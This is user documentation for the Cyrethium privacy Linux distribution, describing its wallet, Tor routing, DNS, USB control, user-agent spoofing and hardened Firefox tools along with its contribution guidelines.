5. Show Balance: Shows wallet balance

6. Show All Addresses: Lists primary address and all subaddresses

7. Create New Subaddress: Creates new subaddress

8. Send XMR: Sends Monero - CAUTION: Double-check address!

9. Show Transactions: Shows transaction history (All, Incoming, Outgoing, Pending, Failed, Pool)

10. Sweep All Funds: Sends entire balance to address - CAUTION: All balance sent!

11. Show Seed Words: Shows 25-word seed phrase - SECURITY: No one should see screen!

12. Refresh Wallet: Scans blockchain and updates balance

13. Check Wallet Status: Shows wallet and daemon status

Advanced Features

14. Integrated Address Operations: Generate random or specific payment ID integrated addresses

15. Payment Verification: Check payment by payment ID, verify transaction proof

16. Transaction Key Management: Store and retrieve transaction keys

17. Address Book: Show all entries, add new, delete

18. Wallet Description: Set and show wallet description

19. Make Donation For Monero: Donate to Monero project

20. Show Version: Shows Monero wallet version

Network Selection

Mainnet: Main Monero network

Stagenet: Test network (mainnet-like)

Testnet: Developer test network

Monero Privacy Features

Ring Signatures: Each transaction mixed with other transactions (typical 11 decoys)

Stealth Addresses: New address created for each transaction

RingCT: Transaction amounts hidden

Dandelion++: Transaction propagation hidden

FAQ

Q: Why is Monero private? A: Uses ring signatures, stealth addresses and RingCT technologies.

Q: Transaction fee? A: Dynamic, usually very low (0.0001-0.001 XMR).

Q: What is subaddress? A: Additional addresses derived from primary address. Used for privacy.

Q: What is integrated address? A: Addresses containing payment ID. Used for payment tracking.

Q: How different from Bitcoin? A: Monero fully private by default, Bitcoin is not.

Security Warnings

1. Seed Phrase Critical: Lose it, lose your wallet

2. Tor Mandatory: IP leak breaks privacy

3. Phishing: Beware of fake wallet sites

4. Malware: Download from trusted sources

Paranoia is an emergency tool that completely isolates the system from all external connections. Blocks all network traffic and maximizes system security.

Usage

sudo paranoia

Main Menu

1. Enable Paranoia Mode: Backs up firewall rules → Blocks all traffic (INPUT/OUTPUT/FORWARD → DROP) → Removes WiFi/Bluetooth modules → Stops network services

2. Disable Paranoia Mode: Clears firewall rules → Sets policies to ACCEPT → Removes module blacklists → Restarts network services

Security Notes

WARNINGS:

1. Tor Usage: Stop Tor before enabling Paranoia mode!

2. Data Loss: Open network connections will be cut

3. Remote Access: SSH/RDP connections will drop

Tor Conflict

WHY STOP TOR? Paranoia mode blocks all network traffic. Result: Tor connection cut, anonymous IP may leak, system becomes unstable

Tips

Emergency Only: Use only in real threat situations

SecDNSChanger is a PyQt5-based tool that easily changes system DNS settings. Choose from 8 different secure DNS providers.

Usage

secdnschanger

DNS Providers

1. Cloudflare (1.1.1.1): Primary 1.1.1.1, Secondary 1.0.0.1 - Fastest DNS, privacy-focused, DNSSEC support

2. OpenDNS (208.67.222.222): Primary 208.67.222.222, Secondary 208.67.220.220

3. Quad9 (9.9.9.9): Primary 9.9.9.9, Secondary 149.112.112.112

4. AdGuard (94.140.14.14): Primary 94.140.14.14, Secondary 94.140.15.15

5. Yandex (77.88.8.8): Primary 77.88.8.8, Secondary 77.88.8.1

6. CleanBrowsing (185.228.168.9): Primary 185.228.168.9, Secondary 185.228.169.9

7. Comodo Secure (8.26.56.26): Primary 8.26.56.26, Secondary 8.20.247.20

8. Google (8.8.8.8): Primary 8.8.8.8, Secondary 8.8.4.4

Important

DNS change requires root, if using Tor DNS already anonymous

Tips

Privacy: Prefer Cloudflare or Quad9

Ad Blocking: Use AdGuard

Curl-Wget Agent Spoofer is a tool that changes user agent strings to anonymize your HTTP requests. Hides your browser and system information with 100+ different user agents.

Usage

curl-wget-agentspoofer

Main Menu

1. Execute CURL with Spoofed User Agent: Makes requests with curl using spoofed user agent

Options: Random user agent, Select from list, Custom user agent

Curl Modes: Basic request, Follow redirects (-L), Include headers (-I), Silent mode (-s), Verbose mode (-v), Custom options

2. Execute WGET with Spoofed User Agent: Downloads with wget using spoofed user agent

Options: Random user agent, Select from list, Custom user agent

Wget Modes: Basic download, Continue partial (-c), Background (-b), Quiet mode (-q), Verbose mode (-v), Custom options

3. Show Available User Agents: Lists all available user agents

4. Show Help: Shows help and documentation

Security Notes

Important: User agent spoofing is basic anonymization, use with Tor, some sites use other fingerprinting methods

TorPortal CLI is an advanced Python-based CLI tool for monitoring Tor network traffic, viewing circuit information, and analyzing security status.

Usage

sudo torportal-cli

Root recommended (for some features)

Main Menu

1. Status Overview: Tor status and general information (Tor status RUNNING/NOT RUNNING, Traffic status Via Tor/Direct, Public IP, Active port count, Circuit node count, Tor process count, Network traffic sent/received)

2. Connection Details: Active Tor connections and port details. For each connection: Port number, Protocol (TCP/UDP), Status (LISTENING, ESTABLISHED, etc.), Local address, Remote address, Detection method (netstat, psutil, port_scan)

Port Descriptions: 9050 SOCKS5 Proxy, 9051 Control Port, 9040 Transparent Proxy, 8118 Privoxy HTTP Proxy, 8080 Alternative HTTP Proxy, 9001 ORPort (Relay), 9030 DirPort (Directory)

3. Tor Circuit Info: Tor circuit and node details (requires stem). Circuit ID, Node type (Guard/Middle/Exit), Nickname, IP address, Country, Fingerprint, Bandwidth, Flags

4. Network Statistics: Detailed network statistics. General traffic (Sent/received bytes, Sent/received packets, Error count in/out, Drop count in/out), Tor connections (Total Tor connection count, Connection states ESTABLISHED/TIME_WAIT), Active interfaces (Interface name, Byte/packet statistics)

5. Security Status: Security status and anonymity check

SECURE (Green): Tor running, Traffic via Tor, IP anonymized

PARTIALLY SECURE (Yellow): Tor running, Traffic NOT via Tor, Configuration error

INSECURE (Red): Tor not running, Direct traffic, IP exposed

Recommendations: If Tor not running - Start Tor, If traffic not routed - Set SOCKS5 proxy (127.0.0.1:9050), If secure - All checks passed

6. Performance Monitor: System and Tor performance data. System (CPU usage %, CPU core count, CPU frequency MHz, RAM usage %, Total/used/available RAM, Disk usage %, Total/free disk, System uptime), Tor (Tor CPU usage %, Tor RAM usage %), Network (Total sent/received). Performance rating: Excellent (CPU < 30%, RAM < 50%), Normal (CPU < 60%, RAM < 70%), High (CPU/RAM high)

7. Tor Configuration: Tor configuration information. Basic config (Control Port, SOCKS Port, Data Directory, Exit Policy, Config File path), Detected ports (Port number, Type SOCKS/Control, Status Active/Inactive). Recommendations: If control port not detected add ControlPort 9051, If SOCKS port not detected check Tor service

8. Continuous Monitor: Real-time continuous monitoring mode

9. Full Report: Summary report of all sections

d. Debug Mode: Toggle debug mode (Detailed error messages, Connection attempts, Detection methods, Debug info)

r. Refresh: Recollect all data

q. Quit: Exit program

USBGuard Manager is a security tool that controls USB devices and blocks unauthorized USB access. Provides whitelist/blacklist based USB management.

Usage

cyrethium-usbguard

Main Menu

1-2. Installation: 1. Install USBGuard package, 2. Install usbutils (lsusb)

3-8. Service Management:

3. Enable USBGuard service (enable auto-start, doesn't start)

4. Disable USBGuard service (disable auto-start)

5. Start USBGuard service

6. Stop USBGuard service

7. Restart USBGuard service

8. Service status

9-11. Device Listing:

9. List USB devices (lsusb) - All USB devices

10. List USB devices (usb-devices) - Detailed USB info

11. List blocked USB devices

12-13. Device Permissions:

12. Temporarily allow USB device (lost on reboot)

13. Permanently allow USB device (added to policy)

14-17. Policy Management:

14. Generate USBGuard policy (create from current devices, default deny)

15. Show current USBGuard policy

16. Backup current USBGuard policy

17. Restore USBGuard policy from backup

18-19. Configuration:

18. Toggle default policy (Allow all ↔ Deny all)

19. Edit USBGuard rules.conf

20. USBGuard Rules Guide: Detailed configuration guide

Policy Options

ImplicitPolicyTarget: allow (allow unknown devices), block (block unknown devices), reject (remove device from system)

PresentDevicePolicy: allow (allow present devices), block (block present devices), keep (keep current state), apply-policy (apply policy)

InsertedDevicePolicy: block (block new devices), reject (reject new devices), apply-policy (apply policy)

Security Notes

Important: 1. Keyboard/Mouse - Add to whitelist on first setup, 2. Backup - Backup before policy changes, 3. Test - Test critical devices

Tips

1. Vendor ID - Allow all devices from same manufacturer: allow id 1234:*

2. Serial Number - Specific device: allow id 1234:5678 serial "ABC123"

3. Port - Specific USB port: allow via-port "1-2"

Cyrethonion is a powerful tool that routes all system traffic through the Tor network. Uses transparent proxy to automatically pass all your internet connections through Tor and provides maximum privacy.

Developer: root0emir | Version: 2.0 Hardened | License: GNU GPL v3.0

Security Features

System-Wide Tor Routing: All TCP traffic automatically routed through Tor

DNS Leak Protection: All DNS queries forced through Tor DNS (port 9053)

IPv6 Disabled: Completely blocks IPv6 data leaks

UDP Traffic Blocking: UDP traffic automatically dropped (Tor doesn't support)

ICMP Privacy Mode: No response to ping requests (stealth mode)

Application Isolation: Each application and website completely isolated

Cyrethonion Tor Guard: Automatically detects suspicious environment variables

Advanced Protection Mechanisms

BAD_FLAGS Attack Protection: NULL Scan, XMAS Scan, SYN+FIN attack, SYN+RST attack, RST Flood protection (max 2 packets/sec), Active on both INPUT and OUTPUT chains

Anti-Spoofing Protection: Loopback spoofing (127.0.0.0/8), Invalid source (0.0.0.0/8), Multicast spoofing (224.0.0.0/4), Reserved space (240.0.0.0/4)

Bridge Support

Obfs4 Bridge Support: To bypass Tor blocking, Bridge add/list/clear, Automatic bridge configuration, Multiple bridge support

System Tray Application (cyrethonion-mate)

Start Tor Routing: Starts system-wide Tor routing. All internet traffic routed through Tor network

Stop Tor Routing: Stops Tor routing and returns to normal internet connection

Change IP Address: Gets new IP by changing Tor exit node. Only works when Tor routing active

Show IP Address: Checks current IP and verifies traffic routed through Tor

Status: Shows Tor service status and routing info

Restart Router: Restarts Tor router service. Useful for connection issues

Add Bridges: Adds bridges to bypass Tor blocking. Only Obfs4 bridges supported

List Bridges: Shows configured bridges

Clear Bridges: Removes all configured bridges and returns to normal Tor entry nodes

Status Icons

Green Icon (ACTIVE): Tor routing active | Red Icon (DISABLED): Tor routing disabled | Yellow Icon (TIMEOUT): Connection timeout | Orange Icon (IP CHANGING): IP address changing | Gray Icon (OFFLINE): No internet connection

Command Line Usage

# Start Tor routing
sudo cyrethonion start

# Stop Tor routing
sudo cyrethonion stop

# Status check
sudo cyrethonion status

# Restart Tor router
sudo cyrethonion restart

# Change IP address
sudo cyrethonion changeid

# Check IP address
cyrethonion ip

# Bridge management
sudo cyrethonion bridges
cyrethonion list-bridges
sudo cyrethonion clear-bridges

# Version info
cyrethonion version

Technical Details - Network Configuration

Tor Ports: TransPort 9040 (Transparent Proxy), SocksPort 9050 (SOCKS Proxy), DNSPort 9053 (DNS), ControlPort 9051 (Control)

Excluded Networks: 127.0.0.0/8, 10.0.0.0/8, 100.64.0.0/10, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 240.0.0.0/4

IPTables Rules

NAT Table: Skip Tor user traffic, Redirect ALL DNS traffic to Tor DNS, Block UDP traffic (Tor doesn't support), Redirect TCP traffic to Tor

Filter Table: Create BAD_FLAGS chains, Route INPUT/OUTPUT packets to BAD_FLAGS chain, Anti-spoofing rules, ICMP blocking (stealth mode), REJECT all non-Tor traffic

Sysctl Configuration

Completely disables IPv6: net.ipv6.conf.all.disable_ipv6 = 1, net.ipv6.conf.default.disable_ipv6 = 1, net.ipv6.conf.lo.disable_ipv6 = 1

Tor Configuration (torrc)

Isolation settings: TransPort/SocksPort with IsolateClientAddr, IsolateSOCKSAuth, IsolateClientProtocol, IsolateDestPort, IsolateDestAddr

Performance and security: HardwareAccel 1, ClientUseIPv6 0, CookieAuthentication 1

Circuit management: NewCircuitPeriod 40, MaxCircuitDirtiness 600, MaxClientCircuitsPending 48, UseEntryGuards 1

Backup System

Cyrethonion automatically backs up: /etc/tor/torrc, /etc/resolv.conf, IPTables rules, Sysctl settings. All settings automatically restored when service stopped.

Troubleshooting

Internet Connection Lost: Click "Restart Router" or "Stop Tor Routing" then "Start Tor Routing", Try system reboot

Bridge Connection Failed: Clear current bridges and add new ones, Paste bridges as-is without spaces or changes, Restart Cyrethonion after adding bridges, Get new bridges from https://bridges.torproject.org/

Slow Connection: Click "Change IP Address" for faster exit node, Restart router for new circuit, This is normal behavior for Tor network

Can't Change IP: Ensure Tor routing started first, Wait few seconds and try again, Restart Tor router if problem persists

tor@default.service Error: Not a critical error, Tor@default.service will auto-restart, Failure at boot doesn't affect actual operation, Routing and Tor process continue working normally

Start Button Not Working: Reboot system, Ensure no other VPN running

IP Check Shows Real IP: Stop and restart Tor routing, Check if some apps bypassing Tor, Restart browser

DNS Change Warning: NO! Don't change DNS while using Cyrethonion, Changing DNS can cause DNS leaks, Cyrethonion uses Tor DNS during routing, Your current DNS backed up before routing starts, Automatically restored when routing stopped

Important Warnings - CRITICAL LIMITATIONS

UDP Traffic Not Anonymized: Cyrethonion automatically drops UDP traffic, Tor only supports TCP connections, UDP packets not routed through Tor

VoIP Applications Risk: Voice calls (Skype, Discord, WhatsApp calls), Video calls (Zoom, Teams, Google Meet), These apps use UDP and may not work. Recommendation: Disable or don't use during Tor sessions

Online Games Risk: Most online games use UDP for performance, Multiplayer games may not work. Recommendation: Only play offline games

WebRTC Leak Risk: Web browsers can leak real IP through WebRTC, Video chat websites may bypass Tor. Solution: Use Hardened/Amnesic Firefox instead of normal browsers, Disable WebRTC in browser settings

DNS Leak Prevention: Some apps may use custom DNS servers, May bypass Tor's DNS routing. Recommendation: Regularly check for DNS leaks

Performance Impact

Tor routing adds significant latency, Download speeds will be much slower, This is normal and necessary for anonymity, Patience required for browsing

Don't Use with Tor Browser

Tor Browser not compatible with Cyrethonion, Tor Browser uses its own Tor instance, Use Hardened/Amnesic Firefox instead

Best Practices

1. Browser: Use Hardened/Amnesic Firefox for web browsing

2. Accounts: Avoid logging into personal accounts

3. Files: Don't download/upload large files

4. Info: Never provide personal information

5. Extensions: Disable extensions and JavaScript when possible

6. Check: Regularly check your IP address

Application-Specific Notes

Browsers: Use Hardened/Amnesic Firefox for maximum security | Email: Use web-based email through Hardened/Amnesic Firefox | Streaming: May not work or be very slow

Security Measures Summary

Cyrethonion Tor Guard: Automatically detects and warns about suspicious environment variables (Library hijacking attacks, Code injection attempts, Privilege escalation attacks, Malware persistence)

Application & Website Isolation: Each application and website completely isolated. IsolateClientAddr (different circuits for different client addresses), IsolateSOCKSAuth (separate circuits for different authentication), IsolateClientProtocol (protocol-based isolation), IsolateDestPort (destination port isolation), IsolateDestAddr (destination address isolation)

Circuit Management: NewCircuitPeriod 40 seconds for new circuits, MaxCircuitDirtiness 600 seconds max circuit usage, UseEntryGuards consistent entry points, EnforceDistinctSubnets different subnets for diversity, MaxClientCircuitsPending 48 circuits for performance

Safe Restart Mechanism: Complete process termination, Port release verification (9040, 9050, 9051, 9053), Clean state restoration, Prevents resource conflicts

FAQ

Q: Can Cyrethonion be used with VPN? A: No, not recommended with VPN. Can cause conflicts.

Q: Do all apps work through Tor? A: Apps using TCP work. Apps using UDP (games, VoIP) don't work.

Q: When to use bridges? A: In countries or networks where Tor is blocked.

Q: How long does IP change take? A: Usually 5-10 seconds.

Q: Does Cyrethonion use much system resources? A: No, uses minimal system resources. Tor service is lightweight.

License and Disclaimer

Cyrethonion licensed under GNU General Public License v3.0. Disclaimer: This tool should only be used for legal and ethical purposes. Developers not responsible for misuse of the tool.

Developer: root0emir | Website: https://cyrethium.org | GitHub: https://github.com/Cyrethium/

Hardened Firefox is Cyrethium's daily-use browser configuration, optimized for security and privacy while maintaining usability. Security Score: 9.2/10

Design Philosophy

Motto: "Secure but usable"

Balanced for daily web browsing, social media, email, and development work on personal computers.

Core Security Features

Telemetry Protection (10/10)

All Mozilla telemetry completely disabled. No data sent to Mozilla or third parties.

Fingerprinting Protection (9/10)

Resist Fingerprinting (RFP) enabled with standardized browser characteristics:

• Timezone spoofing (UTC)
• User agent normalization
• Canvas fingerprinting protection
• WebGL enabled but protected by RFP
• Letterboxing disabled for full-screen usability

Tracking Protection (10/10)

• Strict tracking protection mode
• Total Cookie Protection (TCP)
• Third-party cookie blocking
• Social media trackers blocked

HTTPS/TLS Security (10/10)

• HTTPS-Only Mode enabled
• TLS 1.2+ required (minimum)
• TLS 1.3 preferred
• OCSP must-staple enabled
• Insecure ciphers disabled

WebRTC Protection (8/10)

• WebRTC enabled for functionality
• Local IP hidden (no_host)
• Default address only mode
• Proxy-only when behind proxy
• relay_only disabled (better connection quality)

Cookie Management (8/10)

• Total Cookie Protection enabled
• Cookies are persistent (for usability)
• Third-party cookies blocked
• SameSite=Lax default

Cache Management (7/10)

• Disk cache enabled (1GB) for performance
• Memory cache enabled
• Cache cleared on shutdown

Network Security

• DNS prefetch disabled
• Link prefetch disabled
• Speculative connections disabled
• DoH (DNS over HTTPS) disabled (use system DNS)
• Network partitioning enabled

JavaScript Security (7/10)

• JIT enabled (for performance)
• WebAssembly enabled
• Baseline JIT enabled
• Ion JIT enabled

Disabled Features

• Pocket integration
• Firefox Sync
• Password manager
• Safe Browsing (privacy concern)
• Normandy experiments
• Studies and recommendations

Ideal Use Cases

• Daily web browsing on personal computer
• Social media and email
• Online shopping
• Web development (DevTools available)

Amnesic Firefox is Cyrethium's ultra-secure browser configuration designed for maximum privacy with session-based usage. Security Score: 9.8/10

Design Philosophy

Motto: "Leave no trace"

Core Principle: Every session ends with complete data wipe. The browser starts fresh each time, leaving zero forensic traces.

What "Amnesic" Means

• All data deleted on close
• No session information stored
• Disk cache disabled (RAM only)
• No history, bookmarks, or downloads saved
• Browser resets to "zero state" on every launch

Key Differences from Hardened Firefox

Critical Security Enhancements

Feature	Hardened	Amnesic	Impact
Letterboxing	Disabled	Enabled	Screen resolution fingerprinting blocked
WebGL	Enabled	Disabled	GPU fingerprinting completely blocked
WebRTC relay_only	Disabled	Enabled	IP leak risk eliminated
Disk Cache	Enabled (1GB)	Disabled	No data written to disk
Cookies	Persistent	Session-only	Deleted on close
History	Saved	Disabled	No browsing history recorded
WebAssembly	Enabled	Disabled	WASM attacks prevented
Document Fonts	Enabled	Disabled	Font fingerprinting blocked
DevTools	Enabled	Disabled	Reduced attack surface

Shutdown Cleanup

On browser close, everything is wiped:

• Cache (disk and memory)
• Cookies and site data
• Browsing history
• Download history
• Form data
• Active sessions
• Site settings and permissions
• Offline app data

Security Score Breakdown

• Telemetry Protection: 10/10
• Fingerprinting Protection: 10/10 (Letterboxing + WebGL disabled)
• Tracking Protection: 10/10
• TLS/HTTPS Security: 10/10
• Cookie Management: 10/10 (Session-only)
• Cache Management: 10/10 (Disk cache disabled)
• WebRTC Security: 10/10 (relay_only enabled)
• JavaScript Security: 8/10 (JIT enabled for performance, WASM disabled)
• Network Isolation: 10/10

Performance Trade-offs

• Speed: Slower than Hardened (no disk cache, downloads everything each time)
• RAM Usage: Higher (512MB memory cache vs disk cache)
• Bandwidth: Higher consumption (no caching between sessions)
• Site Compatibility: ~70% (WebGL, WASM, web fonts disabled)

Ideal Use Cases

• Public computers (internet cafes, libraries, hotels)
• Shared devices
• Sensitive one-time operations
• Whistleblowing and activism
• Maximum privacy scenarios

Not Recommended For

• Daily browsing (requires login every time)
• Web development (DevTools disabled)
• Media consumption (slow without cache)
• Long-term projects (no history or session restore)

Comparison with Tor Browser

Similarities: Letterboxing, WebGL disabled, WASM disabled, session-only cookies, no history

Key Difference: Tor Browser has JIT disabled (more secure but slower). Amnesic has JIT enabled (faster but slightly less secure). Tor Browser includes built-in Tor routing; Amnesic requires manual Tor/VPN configuration.

Recommended Strategy

Dual Browser Approach:

• Primary: Hardened Firefox for daily use
• Special Tasks: Amnesic Firefox for sensitive operations

Quick Comparison

Aspect	Hardened	Amnesic
Security Score	9.2/10	9.8/10
Usability	9/10	6/10
Performance	8/10	6/10
Data Persistence	Yes (logins saved)	No (wiped on close)
Ideal For	Daily use, personal PC	Public PC, sensitive tasks

When to Use Each

Use Hardened Firefox When:

• Using your personal computer
• Daily web browsing, social media, email
• You want logins and settings saved
• Performance and speed matter
• Web development (DevTools needed)

Use Amnesic Firefox When:

• Using public or shared computers
• Performing sensitive one-time operations
• Maximum privacy required
• No forensic traces should remain
• Whistleblowing or activism

Key Technical Differences

Amnesic adds these protections:

• Letterboxing (screen resolution fingerprinting blocked)
• WebGL disabled (GPU fingerprinting blocked)
• WebRTC relay_only (IP leak eliminated)
• Disk cache disabled (no data written to disk)
• Session-only cookies (deleted on close)
• History disabled (no browsing history)
• WebAssembly disabled (WASM attacks prevented)
• Document fonts disabled (font fingerprinting blocked)
• DevTools disabled (reduced attack surface)
• Complete shutdown cleanup (everything wiped)

Performance Impact

Amnesic is slower because:

• No disk cache (downloads everything each visit)
• Higher RAM usage (512MB memory cache)
• Higher bandwidth consumption
• Some sites won't work (WebGL, WASM disabled)

Recommended Strategy

Use both browsers for different purposes:

• Hardened: Your daily driver for regular browsing
• Amnesic: Special tool for sensitive operations

Security Score Comparison

• Vanilla Firefox: 6.5/10 (Standard Mozilla configuration)
• Hardened Firefox: 9.2/10 (+2.7 points improvement)

Major Security Improvements in Hardened

Telemetry (Vanilla: 3/10 → Hardened: 10/10)

Vanilla: Sends data to Mozilla (telemetry, health reports, studies)

Hardened: All telemetry completely disabled, zero data sent

Fingerprinting (Vanilla: 4/10 → Hardened: 9/10)

Vanilla: Real browser fingerprint exposed

Hardened: Resist Fingerprinting enabled, standardized characteristics

WebRTC (Vanilla: 3/10 → Hardened: 8/10)

Vanilla: Local and public IP can leak

Hardened: IP hidden with no_host and default_address_only

HTTPS (Vanilla: 7/10 → Hardened: 10/10)

Vanilla: HTTP sites allowed by default

Hardened: HTTPS-Only Mode enforced, TLS 1.2+ required

Tracking (Vanilla: 7/10 → Hardened: 10/10)

Vanilla: Standard tracking protection

Hardened: Strict mode with Total Cookie Protection

Disabled in Hardened (Privacy Concerns)

• Pocket integration
• Firefox Sync
• Password manager
• Safe Browsing (sends URLs to Google)
• DNS over HTTPS (use system DNS)
• All prefetching and speculative connections

When to Use Vanilla vs Hardened

Use Vanilla if: You want maximum compatibility and don't care about privacy/security

Use Hardened if: You want strong privacy and security while maintaining usability

Both browsers are designed for maximum privacy and security. Here's how they compare:

Quick Comparison

Feature	Amnesic	Tor Browser
Security Score	9.8/10	10/10
Anonymity	8/10 (requires Cyrethonion)	10/10 (built-in Tor)
Privacy	10/10	10/10
Performance	6/10	4/10

Similarities (90% overlap)

Both browsers share most privacy features:

• Resist Fingerprinting (RFP) enabled
• Letterboxing enabled
• WebGL disabled
• WebAssembly disabled
• Document fonts disabled
• HTTPS-Only Mode
• WebRTC relay_only enabled
• No telemetry
• Maximum tracking protection

Critical Differences

1. Network Routing (Most Important)

Tor Browser: Built-in Tor network (3-hop routing), automatic anonymity

Amnesic: Requires manual Tor/VPN configuration (use Cyrethium's Cyrethonion tool)

2. JavaScript JIT

Tor Browser: JIT disabled (maximum security, but 10-20x slower JavaScript)

Amnesic: JIT enabled (better performance, slightly less secure)

3. Disk Cache

Tor Browser: Disk cache enabled (cleared on shutdown)

Amnesic: Disk cache disabled (RAM-only, no forensic traces)

4. DevTools

Tor Browser: DevTools available

Amnesic: DevTools disabled (reduced attack surface)

5. Session Restore

Tor Browser: Crash recovery enabled

Amnesic: No session data stored

Performance Comparison

Scenario	Amnesic	Tor Browser
First visit	1.1s	3.0s
JavaScript-heavy	3.0s	10.0s

When to Use Each

Use Tor Browser When:

• Maximum anonymity required
• Activism or whistleblowing
• Under censorship (built-in bridges)
• Accessing .onion sites
• Not using Cyrethium

Use Amnesic Firefox When:

• Using public computers (no disk traces)
• Using Cyrethium (with Cyrethonion)
• Need better performance than Tor
• Maximum privacy but not necessarily anonymity
• Forensic analysis protection is priority

Recommendation

For Cyrethium users: Use Amnesic Firefox with Cyrethonion for Tor routing

For non-Cyrethium users: Use Tor Browser for built-in anonymity

For public computers: Amnesic Firefox (no disk cache)

Security Score Comparison

• Vanilla Firefox: 6.5/10
• Amnesic Firefox: 9.8/10 (+3.3 points improvement)

Critical Differences

Data Persistence

Vanilla: Everything saved (history, cookies, cache, logins)

Amnesic: Everything deleted on close, zero traces left

Forensic Analysis

Vanilla: Forensic analysis possible (data on disk)

Amnesic: Forensic analysis impossible (no disk cache, RAM-only)

Fingerprinting

Vanilla: Real fingerprint exposed (WebGL, fonts, screen resolution)

Amnesic: Maximum protection (WebGL disabled, letterboxing, no fonts)

Telemetry

Vanilla: Sends data to Mozilla

Amnesic: Zero telemetry

Performance Comparison

Metric	Vanilla	Amnesic
First visit	1.0s	1.1s
Second visit	0.3s (cached)	1.1s (no cache)
Site compatibility	100%	~70%

Use Case Decision

Use Vanilla for: Daily browsing with maximum compatibility (if you don't care about privacy)

Use Amnesic for: Public computers, sensitive operations, maximum privacy scenarios

Recommendation: Never use Vanilla. Use Hardened for daily browsing and Amnesic for sensitive tasks.

Cyrethium's tools come pre-integrated into the system. They are not distributed as .deb packages — instead, they are executed directly from source code.

This design ensures transparency and eliminates any suspicion of tampering. Because of this, tools cannot be removed using apt remove.

It is not recommended to remove built-in tools, as many of them are interconnected or dependent on each other. If you delete one, you won't be able to restore it, since Cyrethium does not use any official repositories.

Still, the choice is yours — just make sure you know exactly what you're doing.

Tool Locations

Tools are typically located in the following directories:

/usr/bin
/usr/local/bin
/opt/       # In the full Cyrethium edition, this directory only contains Anti-Exploit Suite modules.

To remove a specific tool, navigate to its location and delete it manually.

Additionally, remove its desktop shortcut (if present) from:

/usr/share/applications/toolname.desktop

If you have developed a tool focused on privacy, security, or threat analysis, you can include your project in the review process. Every tool submitted to the community is evaluated for compliance with system policies and security standards.

Submission Rules:

• The tool must be completely open-source.
• The codebase must be secure, reviewable, and suitable for independent verification.
• The tool's operating principles must not share data with third-party services.
• Tools deemed appropriate after security review are added to the system.

Eligibility Areas:

The tool must focus on at least one of the following categories:

• Privacy
• Security
• Threat Analysis
• Cryptocurrency Security
• Attack Detection / Prevention

Preferred Programming Languages

The language used when developing a tool is critically important in terms of security, performance, and system compatibility. Some languages commonly used in Linux-based systems are preferred because they provide both easy integration and a high level of security.

Python:

It is one of the most preferred languages for cybersecurity tools. Thanks to its modular structure, rich library ecosystem, and easily readable syntax, it offers rapid development opportunities. It is very effective in areas such as network traffic analysis, log examination, and system interaction. It is the most used language in Cyrethium tools.

Shell (Bash):

It is a reliable and fast scripting language found natively on Linux systems. It is preferred for system management, automation, log cleaning, network configuration, and maintenance operations. Since it provides direct access to kernel commands, it offers high control in security tests and system operations.

Perl:

It is powerful in text processing and regular expressions (regex). It offers high performance in situations where network logs, analysis data, or system records need to be processed. Thanks to its powerful script infrastructure, it can work compatibly with old systems.

Lua:

It is a lightweight and embeddable scripting language. It uses few resources in the system, making it ideal for plugin-based or modular security tools. Thanks to its simple syntax, it supports rapid script development.

Go (Partial):

Go is suitable for developing high-performance and concurrent applications. It is especially preferred in tools with high network connectivity and processing intensity. Although its statically compiled structure provides a security advantage, it should be used carefully in terms of file size and dependencies.

Security and Ethical Principles

Every tool submitted is independently reviewed and evaluated according to the following principles:

• Every tool must protect user privacy.
• It cannot contain background connections, telemetry, or data collection operations.
• Malicious, exploitable, or code that can be used for unethical purposes is strictly rejected.
• The goal is to create an ecosystem that protects users' privacy, security, and digital freedom.

Cyrethium ISOs are created using Live-Build, Debian's official image creation tool. Live-Build is a powerful and flexible tool designed to produce customized live operating system images on Debian-based systems.

What is Live-Build?

Live-Build allows developers to compile their own Debian-based distributions in a modular way. That is, when creating an ISO, all details such as which packages will be installed, which services will be active, and which configuration files will be included can be defined. This way, the created ISO becomes completely controllable and reproducible.

Why is Live-Build Used?

Official Debian standard:

It is a tool developed and supported by Debian, which provides a great advantage in terms of stability and security.

Transparent structure:

How the image is produced is completely defined by scripts. This facilitates version management, debugging, and external contributions.

Reproducibility:

When the same configuration files are used, every developer can produce the same ISO. This is important for security because the result becomes deterministic.

Flexibility:

Components such as kernel, desktop environment, package sources, or system settings can be easily changed. This way, custom configured versions, test images, or lightweight versions can be prepared.

General Build Logic

The Live-Build process consists of several basic stages:

Configuration:

The system's architecture, desktop environment, packages to be included, and other parameters are determined with the lb config command.

Build (Compilation):

The live system image is created according to the configuration by running the lb build command. At this stage, the tool downloads the necessary Debian packages, creates the file system, and produces the ISO file.

Customization:

Developers can add additional files, scripts, or configurations using directories like config/includes.chroot/. This method allows the distribution's unique identity to be included in the ISO.

More Information

For comprehensive technical documentation and examples about Live-Build, you can review Debian's official Live-Build guide:

https://live-team.pages.debian.net/live-manual/html/live-manual/index.en.html

Python is the most used programming language in the Cyrethium ecosystem. The reason for this is not just its popularity, but the balance it offers in terms of security, readability, and system integration. It has a wide range of uses in the cybersecurity field, both on the analysis and automation sides.

Why Python?

Readability and ease of maintenance

Python's syntax is simple and the logic of the code can be easily followed. This is a critical feature in security tools because complex and hidden behaviors can be easily noticed. The code being open allows it to be quickly audited by third-party developers.

Wide library ecosystem

Python contains many powerful modules such as socket, asyncio, requests, scapy, psutil, cryptography. This way, functions such as network traffic analysis, process monitoring, encryption, exploit detection, or log examination can be done without needing additional code.

Rapid prototyping

Security tools generally require rapid testing and validation cycles. Python's dynamic structure makes it possible to prototype and test a complex tool in a short time. This provides a great advantage in terms of time in security-focused development.

Cross-platform compatibility

Python code can often run on Linux, Windows, and macOS without any changes. This situation allows developers to test their tools without being limited to just one environment.

Python's Advantages in Linux Environment

Built-in support:

Most Linux distributions come with Python. It does not require extra installation or dependencies. This facilitates system integration and post-distribution operation.

Access to system APIs:

Python can interact directly at the system level on Linux with modules like os, subprocess, fcntl, signal. This way, many operations from network configurations to process management can be automated securely.

Community support:

Linux and Python communities have been intertwined for years. There are plenty of resources and active developer support on security, performance, and debugging.

Python's Security

Python is considered secure at the language level, but "how it is used" is determinative in terms of security. It is not harmful itself; however, there are some points to be careful about:

Pros:

• Since memory management is automatic, classic vulnerabilities like buffer overflow do not occur.
• Since code readability is high, it is difficult to add or hide backdoors.
• Thanks to the large security community, vulnerabilities are generally detected quickly.

Cons:

• It is slower than compiled languages, so it is not preferred in performance-critical applications.
